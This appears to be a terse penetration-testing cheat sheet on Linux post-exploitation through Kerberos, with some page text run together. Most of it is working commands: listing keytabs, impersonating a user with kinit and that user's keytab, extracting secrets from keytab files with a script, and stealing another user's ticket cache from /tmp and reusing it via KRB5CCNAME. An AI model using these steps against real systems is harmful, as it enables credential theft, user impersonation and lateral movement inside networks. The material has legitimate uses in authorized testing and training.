Linux Post-Exploitation
Abusing Keytab
Impersonate user
klist -k -t #list keytab file info
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab #impersonation carni7 using his keytabKeyTabExtract
python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab Abusing ccache
Checking group privileges
id venator177@amogus.kekcp /tmp/krb5cc_768304578_BRB541 .
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
Ticket cache: FILE:/root/krb5cc_768304578_BRB541Ticket Converter
Importing Kerberos Ticket
Last updated